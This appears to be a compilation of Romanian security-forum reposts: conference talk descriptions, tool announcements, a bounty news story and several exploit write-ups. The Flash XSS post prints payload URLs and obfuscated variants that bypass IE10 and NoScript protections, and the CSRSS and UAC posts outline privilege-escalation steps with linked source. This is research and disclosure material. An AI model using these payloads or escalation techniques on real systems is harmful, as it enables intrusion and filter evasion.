Nytro

Derbycon 2013 - Pass-The-Hash 2: The Admin’S Revenge - Skip Duckwall, Chris Campbell Description: ome vulnerabilities just can’t be patched. Pass-The-Hash attacks against Windows enterprises are are still successful and are more popular than ever. Since the PTH-Suite was released at BlackHat last year, Microsoft published their guide for mitigating the attack. Skip and Chris will cover some of the short-comings in their strategies and offer practical ways to detect and potentially prevent hashes from being passed on your network. Learn how to stop an attacker’s lateral movement in your enterprise. Bio: “Chris Co-presented PTH talk last year at Blackhat Also spoke at BsidesLV, Derbycon, Shmoocon & BsidesPR www.obscuresec.com @obscuresec Works for Crucial Security (Harris Corp) Skip Co-presented PTH talk last year at Blackhat Also spoken at Defcon, derbycon passing-the-hash.blogspot.com @passingthehash on twitter Works for Accuvant Labs” For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Pass-The-Hash 2: The Admin’S Revenge - Skip Duckwall, Chris Campbell

WiFi Password Dump [TABLE=align: left] [TR] [TD=class: page_subheader]About [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 100%] [TR] [TD=width: 120, align: center] [/TD] [TD=align: justify]WiFi Password Dump is the free command-line tool to quickly recover all the Wireless account passwords stored on your system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays following information [/TD] [/TR] [TR] [TD] WiFi Name (SSID) Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP) Password Type Password in Hex format Password in clear text [/TD] [/TR] [TR] [TD=align: justify] Being command-line tool makes it useful for penetration testers and forensic investigators. For GUI version check out the Wi-Fi Password Decryptor. It works on both 32-bit & 64-bit platforms starting from Windows Vista to Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] WiFi Password Secrets[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Depending on the platform, 'Wireless Configuration Manager' uses different techniques and storage locations to securely store the WiFi settings. [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]On Vista and higher systems all the wireless parameters including SSID, Authentication method & encrypted Password are stored at following file, [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=class: page_code]C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\{Random-GUID}.xml [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] Here each wireless device is represented by its interface GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} and all the wireless settings for this device are stored in XML file with random GUID name.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]If you are interested to know how these WiFi settings are stored and how 'WiFi Password Decyptor' actually recovers the passwords, read on to our research article,[/TD] [/TR] [TR] [TD]Exposing the WiFi Password Secrets[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] How to use?[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]WiFi Password Dump is very easy to use tool. It is command-line/console based tool, hence you have to launch it from the command prompt (cmd.exe) as Administrator. Here is the simple usage information Launch command-prompt (cmd.exe) on your system as Administrator. In the cmd prompt move to directory where you have installed or copied WiFiPasswordDump tool Now run the tool by just typing WiFiPasswordDump.exe It will automatically discover and display all the recovered Wireless passwords as shown in screenshot below. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Screenshots[/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD]Screenshot 1: 'WiFiPasswordDump' showing all the recovered Wireless Passwords from Windows 7 system.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center][/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Release History[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [TABLE=width: 90%, align: center] [TR] [TD=class: page_sub_subheader]Version 1.0: 8th Oct 2013[/TD] [/TR] [TR] [TD]First public release of WiFi Password Dump.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Download[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download WiFi Password Dump v1.0 License : Freeware Platform : Windows Vista, Windows 2008, Windows 7, Windows 8 Download [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] Sursa: WiFi Password Dump : Free Command-line Tool to Recover Wireless Passwords [/TD] [/TR] [/TABLE]

[h=1]PhysicsJS (Yes, a JavaScript Physics engine)[/h] In today's Web Wednesday post we're highlighting something you might think a little oxymoronic, a JavaScript Physics engine. It's still in an Alpha status, but even so, it's looking pretty cool... [h=2]PhysicsJS[/h] A modular, extendable, and easy-to-use physics engine for javascript PhysicsJS is still under development (alpha version 0.5.1), and documentation is unfinished. Feel free to use it, just be warned that the API is in flux and better documentation is on its way! (Contributors and help needed!) [h=4]Features[/h] Use as an AMD Module (requireJS), or global namespace. Modular! Only load what you need. The core library is only 31k minified. Extendable! Don’t like the collision detection algorithm? Replace it with your own! Not tied to a specific renderer. Display it in DOM, HTML5 Canvas, or whatever… Easy! It’s a library written IN javascript… not C compiled into javascript. The syntax is familiar for javascript developers. Extensions to support points, circles, and arbitrary convex polygons. Extensions to support constant gravity, newtonian gravity, collisions, and verlet constraints. The fastest way to get a feel for what's possible is by checking out the Demos. [h=2]Demos[/h] There's even documentation already too. [h=2]https://github.com/wellcaffeinated/PhysicsJS/wiki[/h] Introductory documentation can be found on the PhysicsJS website. The wiki contains more advanced usage instructions. Due to the newness of this library, documentation is non-exhaustive. If there are any points of confusion, please feel free to log an issue or contact me. You can also edit the wiki yourself to fill in the gaps. Any help with documenting is appreciated. [h=4]Topics[/h] Fundamentals Scratchpads - they speed up computations Bodies PubSub Behaviors Collisions Integrators Renderers And the source is officially available too; [h=2]https://github.com/wellcaffeinated/PhysicsJS[/h] Sursa: PhysicsJS (Yes, a JavaScript Physics engine) | Coding4Fun Blog | Channel 9

[h=1]C++ and the Windows Runtime[/h] Date: September 6, 2013 from 9:00AM to 9:35AM Day 3 Speakers: Aleš Hole?ek [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, Windows Phone, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 36.6 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 216.9 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 171.4 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 475.8 MB Mid Quality MP4 (Windows Phone, HTML5) [h=3]File size[/h] 332.3 MB High Quality WMV (PC, Xbox, MCE) In this talk, Ales discusses the evolution of the Windows platform and the story of its development, and the key role that C++ plays in it. In the spirit of "Going Native", the new platform and application model is written almost exclusively in C++. Sursa: C++ and the Windows Runtime | GoingNative 2013 | Channel 9

Windows 7 UAC whitelist: Code-injection Issue (and more) Quick Windows 7 RTM update: Everything below still applies to the final retail release of Windows 7 (and all updates as of 14/Sep/2011). Quick Windows 8 update: Everything below still applies to the Windows 8 Developer Preview released on 13/Sep/2011. It is early days, of course, but from a quick look it does not seem that anything UAC-related has changed at all in Win8. Contents: Win 7 UAC Code-Injection: Program & source-code Win 7 UAC Code-Injection: Video demonstrations Some Quotes Win 7 UAC Code-Injection: Summary Win 7 UAC Code-Injection: The good news Win 7 UAC Code-Injection: How it works UAC in Vista and Windows 7: Mistakes then and now (Better ways MS could've responded to complaints about Vista.) UAC Comparison: Two file-managers If a whitelist makes sense then it must be user-configurable Previous Windows 7 UAC issues To those saying, "but it requires code to get on the box" To those saying, "but UAC isn't a security boundary" To those saying, "but it's only a beta" Quick response to a couple of newer things Program, Source Code and Step-by-Step Guide While Windows 7 was still in beta Microsoft said this was a non-issue, and ignored my offers to give them full details for several months. so there can't be an issue with making everything public now. Win7ElevateV2.zip (32-bit and 64-bit binaries; use the version for your OS.) Win7ElevateV2_Source.zip (C++ source code, and detailed guide to how it works.) Source in HTML format (for browsing online) Step-by-step guide (description of what the code does) This works against the RTM (retail) and RC1 versions of Windows 7. It probably won't work with the old beta build 7000 due to changes in which apps can auto-elevate. Microsoft could block the binaries via Windows Defender (update: they now do via MSE), or plug the CRYPTBASE.DLL hole, but unless they fix the underlying code-injection / COM-elevation problem the file copy stuff will still work. Fixing only the CRYPTBASE.DLL part, or blocking a particular EXE or DLL, just means someone has to find a slightly different way to take advantage of the file copy part. Finding the CRYPTBASE.DLL method took about 10 minutes so I'd be surprised if finding an alternative took long. Even if the hole is fixed, UAC in Windows 7 will remain unfair on third-party code and inflexible for users who wish to use third-party admin tools. Sursa: Windows 7 UAC whitelist: Code-injection Issue (and more)

[h=1]Linux SNMP MIB Browser[/h] An SNMP MIB browser is an indispensable tool for engineers and system administrators to manage SNMP enabled network devices such as routers, switches, servers and workstations. The information provided by SNMP includes uptime, interface traffic data, routing information, TCP and UDP connection information, installed software, and much more. In this tutorial, I introduce qtmib, an easy-to-use SNMP browser available for Linux and published under GPLv2 license. The program is build as a front-end for net-snmp tools using QT4 library. qtmib browser window qtmib features qtmib offers a number of powerful features: SNMP v1 and v2c support. OID translation. MIB search capabilities. A huge number of built-in MIBs. Support for adding private MIBs. Network discovery. Easy-to-read reports: system, interfaces, routing table, TCP/UDP connections, running process, and installed software, Installation Installation follows the regular ./configure && make && sudo make install Unix pattern. You would need net-snmp tools and QT4 development libraries as dependencies. An Ubuntu .deb package is also provided. Screenshot tour qtmib host selection qtmib network discovery qtmib report selection Sursa: Linux SNMP MIB Browser | l3net - a layer 3 networking blog

CVE-2011-1281 Privilege escalation in CSRSS proof of concept After one years without blogging (all my apologies), I’m back. A few days ago I’ve seen the pwnie awards nominations list, there were lot’s of interesting and sophisticated bug exploitation. But one attract my attention “Privilege escalation in CSRSS” discovered by Matthew ‘j00ru’ Jurczyk. If you want to undestand this vulnerability and the way to exploit it, read this excellent post CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability | j00ru//vx tech blog. And if you’re not familiar with CSRSS I advice you to read this article or this one (in french). So, for writing the PoC we have to follow this steps : Spray the shared WIN32K section, by creating a sufficient amount of USER objects. The section is then going to be mapped to every process running in the context of the local desktop, thus we can perform this step at this early point, Create N instances of a process, each of which will create a single zombie console and then go idle, Kill all N instanes of the processes, Create 3N local threads, (**) Kill 2N threads (in the order described in the “Second Stage” section), Kill the remaining N threads, Emulate the win+u key presses, resulting in a new instance of UTILMAN.EXE being created, Call SendMessage(HWND_BROADCAST,WM_SYSCOMMAND,0xFFF7,0) , triggering the execution of CreateRemoteThread on each of the N freed handles. * – by creating a zombie console, we also mean replacing the original PropertiesProc address (used in kernel32!AllocConsole) with a custom pointer. ** – the technique is very time-sensitive. If any handle is picked / stored on the free-list between steps 3 and 4, than steps 5 and 6 might not succeed in setting up the expected free-list handle layout. I wont speak about first step immediately for different reason. Let’s start with step two “create a single zombie console”, for me it’s the most hard part. We have to code AllocConsole and AllocConsoleInternal (I only scope Windows XP version for the moment). With AllocConsoleInternal we can control the PropRoutine & CtrlRoutine of the console. For conding this function I start googling with “AllocConsoleInternal + PropRoutine + CtrlRoutine” and reach this function definition : BOOL APIENTRY AllocConsoleInternal( IN LPWSTR lpTitle, IN DWORD dwTitleLength, IN LPWSTR lpDesktop, IN DWORD dwDesktopLength, IN LPWSTR lpCurDir, IN DWORD dwCurDirLength, IN LPWSTR lpAppName, IN DWORD dwAppNameLength, IN LPTHREAD_START_ROUTINE CtrlRoutine, IN LPTHREAD_START_ROUTINE PropRoutine, IN OUT PCONSOLE_INFO pConsoleInfo) With some call to ntdll!CsrAllocateCaptureBuffer, ntdll!CsrCaptureMessageBuffer for desktop, title and curent dir memory allocation. And then ntdll!CsrClientCallServer with allocConsole request we will reach winsrv!SrvAllocConsole and then spawn a console. For testing we lunch a broken console and kill his process and his parent process, after that we do a “right clic + proprieties/default” on the broken console and then we have a winsrv!InternalCreateCallbackThread executed with free handle! (the killed parent process handle precisely) Step 3, 4, 5, 6, 8 is quite easy. Step 7 (WIN+U emulation) too but SetKeyboardState and PostMessage doesn’t work, we have to use keybd_event (depreciated) or SendInput to invoke utilman.exe. Therefore, with all this steps we are able to get CSRSS to call CreateRemoteThread with a system process handle and a controlled start address. Now we need step one “Spray the shared WIN32K section of system process with USER object” and it’s done! For this we have to invoke ultiman (WIN+U) which spawn three new process : -> ultiman.exe [NT AUTHORITY\\SYSTEM] +-> ultiman.exe /start [uSER] +–> narrator.exe /UM [uSER] Then we create user object like MessageBox with over long title (32Ko). But ultiman (system) doesn’t share the win32k section with other process at all times. After trying differents unsuccessful methods, I decided contact j00ru who give me the solution. We can inject user object in ultiman (system) if another user (regardless of his privileges) is logged on the machine at the same time. At this moment, I haven’t found explanation of this behaviour. I think it’s something in relation with Desktop/Winstation/Session, if you have some idea tell me. Source of the poc : Index of /prog/blog/allocConsole Thanks to j00ru for his help and all shared knowledge on his blog, hitb and so on! Sursa: CVE-2011-1281 Privilege escalation in CSRSS proof of concept

Microsoft pays Australian hacker $100,000 for finding security holes Ben Grubb and Jim Finkle Date October 9, 2013 - 1:11PM Winning: James Forshaw of security firm Context. Photo: Context Microsoft is paying a well-known Australian hacking expert more than $100,000 for finding security holes in its software, one of the largest bounties awarded to date by a tech company. The company also released a much anticipated update to Internet Explorer, which it said fixes a bug that made users of the browser vulnerable to remote attack. James Forshaw, who heads vulnerability research at Melbourne-based consulting firm Context Information Security, won Microsoft's first $US100,000 ($106,000) bounty for identifying a new "exploitation technique" in Windows, which will allow it to develop defences against an entire class of attacks, the company said. Generous reward: Microsoft. Photo: Bloomberg Forshaw is among the many "white hat" hackers who hack for good and get rewarded for their efforts. Companies such as Apple and Facebook have hall of fame pages on their websites to recognise hackers, and some companies even pay them. Advertisement Forshaw, who is currently travelling to attend a security conference, earned another $US9400 for identifying security bugs in a preview release of Microsoft's Internet Explorer 11 browser, Katie Moussouris, senior security strategist with Microsoft Security Response Centre, said in a blog post. "Over the past decade working in secure development and research, I have discovered many interesting security vulnerabilities with a heavy focus of complex logic bugs," Forshaw said. "I'm keenly interested in the intellectual puzzle of finding novel exploitation techniques and the creativity it requires." To find his winning entry, Forshaw studied the mitigations available today and after brainstorming identified a few potential angles. "Not all were viable but after some persistence I was finally successful." He said receiving recognition for his entry was "exciting" to him and his employer. "It also gives me the satisfaction that I am contributing to improving the security of both Microsoft's and Context's customers." Microsoft unveiled the reward programs four months ago to bolster efforts to prevent sophisticated attackers from subverting new security technologies in its software, which runs on the majority of the world's PCs. Forshaw has been credited with identifying several dozen software security bugs. He was awarded a large bounty from Hewlett-Packard for identifying a way to "pwn", or take ownership of, Oracle's Java software in a high-profile contest known as Pwn2Own (pronounced "pown to own"). Microsoft also released an automatic update to Internet Explorer on Tuesday afternoon to fix a security bug that it first disclosed last month. Researchers say hackers initially exploited that flaw to launch attacks on companies in Asia in an operation that cyber security firm FireEye has dubbed DeputyDog. Marc Maiffret, chief technology officer of the cyber security firm BeyondTrust, said the vulnerability was later more broadly used after Microsoft's disclosure of the issue brought it to the attention of cybercriminals. He is advising PC users to immediately install the update to Internet Explorer, if they do not have their PCs already set to automatically download updates. "Any time they patch something that has already been used [to launch attacks] in the wild, then it is critical to apply the patch," Maiffret said. That vulnerability in Internet Explorer was known as a "zero-day" because Microsoft, the targeted software maker, had zero days notice to fix the hole when the initial attacks exploiting the bug were discovered. In an active, underground market for "zero day" vulnerabilities, criminal groups and governments sometimes pay $US1 million or more to hackers who identify such bugs. Microsoft's reward is slightly more generous than that of Yahoo!, which recently offered a security researcher a $US25 voucher to the company's online store for reporting three security flaws. Yahoo later opened up a program, with rewards of up to $US15,000, after security researchers ridiculed the minuscule $US25 prize. Sursa: Microsoft pays Australian hacker $100,000 for finding security holes

The Breach Attack Rohit T October 07, 2013 Introduction Back in 2012, when Juliano Rizzo and Thai Duong announced the CRIME attack, a TLS / SSL Compression attack against HTTPS, the ability to recover selected parts of the traffic through side channel attacks was proven. This attack was mitigated by disabling the TLS / SSL level compression for most of the browsers. This year at Black Hat, a new attack called BREACH (browser reconnaissance and exfiltration via adaptive compression of hypertext) was announced and it commanded the attention of entire industry. This presentation, titled “SSL Gone in 30 seconds,” is not properly understood and hence there seems to be some confusion about how to mitigate the problem. So I felt that this article should give some detailed insight into how notorious the attack is, how it works, how practical it is, and what needs to be done to mitigate it. So let’s have a look. BREACH Attack Unlike the previously known attacks, such as BEAST, LUCKY, etc., BREACH is not an attack against TLS; it is basically an attack against HTTP. If you are familiar with the famous Oracle padding attack, BREACH is somewhat easy to understand. A BREACH attack can extract login tokens, email addresses, and other sensitive information from TLS encrypted web traffic in as little as 30 seconds (depending on the number of bytes to be extracted). The attacker just needs to trick the victim into visiting a malicious link to execute the attack. Before going into the details, let me explain a little bit more about the basic things you need to know. Web pages are generally compressed before the responses are sent out, which is called HTTP compression, primarily to make better use of available bandwidth and to provide greater transmission speeds. The browser usually tells the server (through the “Accept-Encoding” header), what compression methods it supports and the server accordingly compresses the content and sends it across. If the browser does not support any compression then the response is not compressed. The most commonly used compression algorithms are gzip and deflate. Accept-Encoding: gzip, deflate When the content arrives, it is uncompressed by the browser and processed. So, basically with SSL-enabled web sites, the content is first compressed, then encrypted and sent. But you can determine the length of this compressed content even when it’s wrapped by SSL. How Does It Work? The attack primarily works by taking advantage of the compressed size of the text when there are repetitive terms. Here is a small example that explains how deflate takes advantage of repetitive terms to reduce the compressed size of the response. Consider the search page below, which is present after logging into this site: http://www.ghadiwala.com/catalogsearch/result/?q= Observe that the text highlighted in red box is the username. Now enter any text (say “random”) and click “Search.” URL: Search results for: 'random' , GhadiWala.com So you can control the response through the input parameter in the URL. Now imagine that the search term is “Pentesting” (which is the username in this case). URL: Search results for: 'Pentesting' , GhadiWala.com Now, when the deflate algorithm is compressing the above response, it finds that the term “Pentesting” is repeated more than once in the response. So, instead of displaying it a second time, the compressor says “this text is found 101 characters ago.” This reduces the size of the compressed output. In other words, by controlling the input search parameter, you can guess the username. How? The compressed size would be least when the search parameter matches the username. This concept is the base for the BREACH attack. Practical Attack Now let us see how an attacker would practically exploit this issue and steal any sensitive information. Consider the site below and assume a legitimate user has just signed in. [before signing in to the application] [search page, which is accessible after logging in] As shown in the above figure, also assume that there is some sensitive data in the Search page, for example, a card number. When the user searches for something (say “test”) the following message is displayed. Now an attacker, using social engineering techniques, could lure this currently signed-in user to click on a link. The link would be a simple html page that has a JavaScript in it that will request searches continuously for search terms “100-1000.” For example, the JavaScript would request the URLs shown below: http://localhost/demo/Search?p=100 http://localhost/demo/Search?p=101 ……… http://localhost/demo/Search?p=10000 The attacker can also get the compressed sizes of the responses for each of these requests. Can you guess why the compresses sizes for each of these responses would differ and can you guess which request would have the smallest compressed size? Below are the requests with the smallest compressed sizes: http://localhost/demo/Search?p=4545 http://localhost/demo/Search?p=5454 http://localhost/demo/Search?p=4543 http://localhost/demo/Search?p=5433 Below is the explanation of why the above requests have the smallest compressed sizes. Take the first request. Here is the response from the server: URL: http://localhost/demo/Search?p=4545 As shown above, when the deflate algorithm encounters this, it makes an easy representation of the repetitions and thus results in a least compressed size. So by analyzing the compressed size for each of the requests from 100-10000, an attacker can simply deduce what the card number is in this case. This the beauty of this attack lies in the fact that we did not decrypt any traffic but just by analyzing the size of the responses we were able to predict the text. To summarize in simple steps, for an application to be vulnerable to this breach attack, here are the conditions that it must fulfill: The server should be using HTTP level compression. There must be a parameter that reflects the input text. (This will be controlled by the attacker). The page should contain some sensitive text that would be of interest to the attacker. Remediation Turning off HTTP compression would save the day, but that cannot be a possible solution, since all the servers rely on it to effectively manage the bandwidth. Here are some of the other solutions that can be tried: Protecting the vulnerable pages with a CSRF token. Adding random bytes to the response to hide the actual compressed length. Separating the sensitive data from the pages where input text is displayed. Sursa: The Breach Attack

Catch-up on Flash XSS exploitation – bypassing the guardians! – Part 1 Catch-up on Flash XSS exploitation – bypassing the guardians! – Part 1 I had tweeted a few techniques in exploiting XSS in vulnerable flash files a few months ago. I thought it is a good idea to summarise them here and share it with you. I will try to add more parts to this in future… Bypassing IE protection/feature against SWF reflected XSS: It seems only IE as a browser has protections against normal reflected XSS attacks on flash files. For example, if you open the following link in IE10, Javascript won’t be executed: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); Instead, it will show you the following error message in the console (press F12 to see it): xssproject.swf, line 1 character 1 SCRIPT5: Access is denied. xssproject.swf, line 1 character 37 The same script is run easily in Firefox (without NoScript) and Google Chrome. Moreover, the other methods that I had invented previously in the following blog post do not work in IE10: “XSS by uploading/including a SWF file | Soroush Dalili - Computer Security Is My Interest!”. Now, I have found a workaround to also bypass IE10 protections and run the script: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]* "<script>alert(document.domain)</script>"' *[/TD] [/TR] [/TABLE] It is based on the following simple fact: “javascript:x=”echo”” in the URL, will print “echo” on the screen and it can contain HTML tags. Any script will then have access to the objects of the original page. Flash URLDecode feature that can be used to bypass possible protections and obfuscate the attack: If you need to send the vectors to a server behind a firewall (flashvars can be sent after the “#” character to be hidden from the server) or to bypass client-side Anti-XSS protections, this method can be very useful. Flash discards invalid URL encoded values completely: A) It discards 2 characters if you have an invalid hex character ([^0-9a-fA-F]) immediately after the percentage character. Example: “%X” or “%=” It discards 3 characters if you have a valid hex character after the percentage character followed by an invalid hex character. Example: “%AX” or “%A&” Note1: During this test, I have observed that sometimes values greater than 127 in ASCII will be converted to a question mark (“?”) character. This happens in URL redirection cases. Note2: Encoded BOM characters (“%EF%BB%BF”) can also replace the space characters. Example: “alert(1)” can be rewritten as “alert%EF%BB%BF(1)” (Byte order mark - Wikipedia, the free encyclopedia) Exploits can even be more deceptive if you use the following vectors: “%#” or “%A#”. It will not send your complete vector to the server because of the “#” character. Example: Original queries: [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); "<script>alert(document.domain)</script>"'[/TD] [/TR] [/TABLE] New equivalent queries: [TABLE] [TR] [TD=class: gutter]1 2 3 4[/TD] [TD=class: code]http://0me.me/demo/xss/xssproject.swf?%#js=al%A#e%Xrt(docum%A#ent.doma%A#in); http://0me.me/demo/xss/xssproject.swf?%I%R%S%D%%Ljs=loca%Xtion.hr%Yef='jav%Zascri%AXpt:x="<sc%AYript>ale%AZrt(docu%?ment.dom%/ain)</sc%&ript>"'[/TD] [/TR] [/TABLE] As you can see in these examples, a flash based XSS attack can be obfuscated very well! NoScript was bypassed initially by using this trick but it has been patched since version 2.6.6.8 (NoScript - JavaScript/Java/Flash blocker for a safer Firefox experience! - changelog - InformAction). Thanks to Giorgio Maone (@ma1). Next Part I will try to post more related materials in regards with Flash security. I may divulge some 0days here…, who knows? Sursa: Catch-up on Flash XSS exploitation – bypassing the guardians! – Part 1 | Soroush Dalili - Computer Security Is My Interest!

Derbycon 2013 - Windows Attacks: At Is The New Black - Chris Gates &Amp; Mubix “Rob” Fuller Description: Description: A follow on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats. Bio: Chris Gates: Chris joined LARES in 2011 as a Partner & Principal Security Consultant. Chris has extensive experience in network and web application penetration testing as well as other Information Operations experience working as an operator for a DoD Red Team and other Full Scope penetration testing teams (regular pentesting teams too). Chris holds a BS in Computer Science and Geospatial Information Science from the United States Military Academy at West Point and holds his… redacted…no one cares anyway. In the past, he has spoken at the United States Military Academy, BlackHat, DefCon, DerbyCon, Toorcon, Brucon, Troopers, SOURCE Boston, OWASP AppSec DC, ChicagoCon, NotaCon, and CSI. He is a regular blogger carnal0wnage.attackresearch.com Mubix “Rob” Fuller: Mubix is a Senior Red Teamer. His professional experience starts from his time on active duty as United States Marine. He has worked with devices and software that run gambit in the security realm. He has a few certifications, but the titles that he holds above the rest is FATHER, HUSBAND and United States Marine. For More Information please visit : - Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Windows Attacks: At Is The New Black - Chris Gates &Amp; Mubix “Rob” Fuller

Lynis Auditing Tool 1.3.1 Authored by Michael Boelen | Site rootkit.nl Lynis is an auditing tool for Unix (specialists). It scans the system and available software to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes. This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems. Changes: This release has several generic updates, including adjustments of text and fixes in the detection of binaries, including performance tweaks. Several minor adjustments have been implemented to improve several audit checks. Download: http://packetstormsecurity.com/files/download/123498/lynis-1.3.1.tar.gz Sursa: Lynis Auditing Tool 1.3.1 ? Packet Storm

Derbycon 2013 - Identifying Evil: An Introduction To Reverse Engineering Malware And Other Software - Bart ‘D4ncind4n’ Hopper Description: Description: “You just discovered a piece of suspicious software. What are your next steps? This talk will explain the fundamentals of malware analysis and reverse engineering. These skills are increasingly needed due to the failures of signature based malware detection systems, inclusion of undesirable features in common software (grayware), and undocumented features in commercial software. Key topics covered will include typical exploit chains, discovering indicators of compromise, common evasion and obfuscation techniques, and the use of analysis tools and techniques. A gentle introduction to assembly language and windows API calls will be given to allow the presentation to be of interest for all technical levels.” Bio: “Bart ‘d4ncingd4n’ Hopper is a security analyst at a financial instituion. Prior to his work in security, he was a systems administrator for a healthcare start up. His training came from the ‘Book of the Month’ club, a quest for knowledge, and the school of hard knocks.” For More Information please visit : - Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Identifying Evil: An Introduction To Reverse Engineering Malware And Other Software - Bart ‘D4ncind4n’ Hopper

Daca chiar vrei sa dai bani pe ceva, da-i pe niste carti. Asta daca esti ca mine si nu poti citi multe pagini de pe calculator si preferi hartia, daca nu ai astfel de probleme, gasesti cam orice carte vrei PDF. Phrack e singura "revista" care merita citita. Ar mai fi asta: "Digital Whisper Security Magazine". Problema e simpla: nu e in engleza, e in "hebrew".

Esti batran Lucrez cu niste contoare care au 3 tipuri de firmware pe ele: 1. Firmware de meter - care inregistreaza consumul electric 2. Firmware de ASM - are interpretor pentru un limbaj asemanator cu ASM, compilat, pe care il executa 3. Firmware de radio (wireless) - cu care se conecteaza la o retea wireless si trimite datele de pe meter Pentru encryptia datelor, pe langa cea de layer 2 se poate folosi AES sau ECC la nivelul de aplicatie. Contoarele electrice din ziua de azi nu sunt tocmai niste porcarii

Nmap Development: Re: Hakin9's new Nmap Guide

Windows Root Certificate Program members

XPATH Injection Authored by Chetan Soni This is a brief whitepaper that covers XPATH injection attacks and use cases. In a typical Web Application architecture, the data is stored on a Database server. This Database server store data in various formats like an LDAP, XML or RDBMS database. The application queries the server and accesses the information based on the user input. Normally attackers try to extract more information than allowed by manipulating or using the query with specially crafted inputs. Download: http://packetstormsecurity.com/files/download/123483/xpath-injection.pdf Sursa: XPATH Injection ? Packet Storm

Windows NT native API reference Exemplu: ZwQuerySystemInformation queries information about the system. NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL ); Parameters SystemInformationClass The type of system information to be queried.The permitted values are a subset of the enumeration SYSTEM_INFORMATION_CLASS, described in the following section. SystemInformation Points to a caller-allocated buffer or variable that receives the requested system information. SystemInformationLength The size in bytes of SystemInformation, which the caller should set according to the given SystemInformationClass. ReturnLength Optionally points to a variable that receives the number of bytes actually returned to SystemInformation; if SystemInformationLength is too small to contain the available information, the variable is normally set to zero except for two information classes (6 and 11) when it is set to the number of bytes required for the available information. If this information is not needed, ReturnLength may be a null pointer. Download: multi-desktop-manager.googlecode.com/files/NativeAPI.pdf

Am globul de cristal in service, nu pot ghici de ce nu iti merge, de aceea as sugera sa imi dai ceva mai multe detalii... Ce telefon ai? Ce versiune a sistemului de operare? Ce certificate ai instalate? Ce eroare de conexiune primesti?

